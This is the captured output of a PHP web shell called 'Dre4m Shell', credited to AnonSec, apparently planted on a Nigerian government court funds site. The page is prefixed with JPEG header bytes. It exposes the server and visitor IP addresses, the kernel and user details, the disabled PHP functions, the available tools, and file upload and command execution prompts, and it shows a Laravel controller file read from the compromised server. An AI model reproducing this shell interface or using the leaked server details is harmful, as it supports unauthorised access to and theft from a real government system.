ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.133.132.161
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/app/Http/Controllers/function_setup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/app/Http/Controllers/function_setup/FunctionController.php
<?php

namespace App\Http\Controllers\function_setup;
use Illuminate\Http\Request;
use App\Http\Controllers\Controller;
use App\Http\Requests;
use DB;

class FunctionController extends Controller
{
   public function create()
    {
        $data['roles']          = DB::table('user_role')->get();
        $data['functions']        = DB::table('function')->paginate(15);
        return view('function_setup/function/create',$data);
    }

    
    public function addFunction(Request $request)
    {
        $this->validate($request, [
            'name'                 => 'required|string',
            ]);

        $functionname              = $request['name'];
         $rank                     = $request['rank'];
        $date                      = date('Y-m-d');
        DB::table('function')->insert(array( 
        'function_name'            => $functionname,
        'function_rank'            => $rank,
        'created_at'               => $date,
        ));
        return redirect('function/create')->with('message','Function Created Successfully');
    }

   
    public function displayModules()
    {
      $data['modules'] = DB::table('function')->get();
      return view('function_setup/function/viewfunction', $data);
    }

   
    public function editFunction($id)
    {
         $data['edit'] = DB::table('function')->where('functionID','=', $id)->first();
         return view('function_setup/function/edit',$data);
    }

      public function edit(Request $request)
    {
        $id = $request['id'];
         $edit = DB::table('function')->where('functionID','=', $id)->first();
         return response()->json($edit);
    }

   
    public function updateFunction(Request $request)
    {
         $functionname             = $request['name'];
        $functionID               = $request['functionID'];
        $rank                     = $request['functionRank'];

        DB::table('function')->where('functionID','=',$functionID)->update(array( 
        'function_name'            => $functionname,
        'function_rank'            => $rank,
        ));
        return redirect('/function/create')->with('message','Function Successfully Updated');
    }

    
}

Anon7 - 2022
AnonSec Team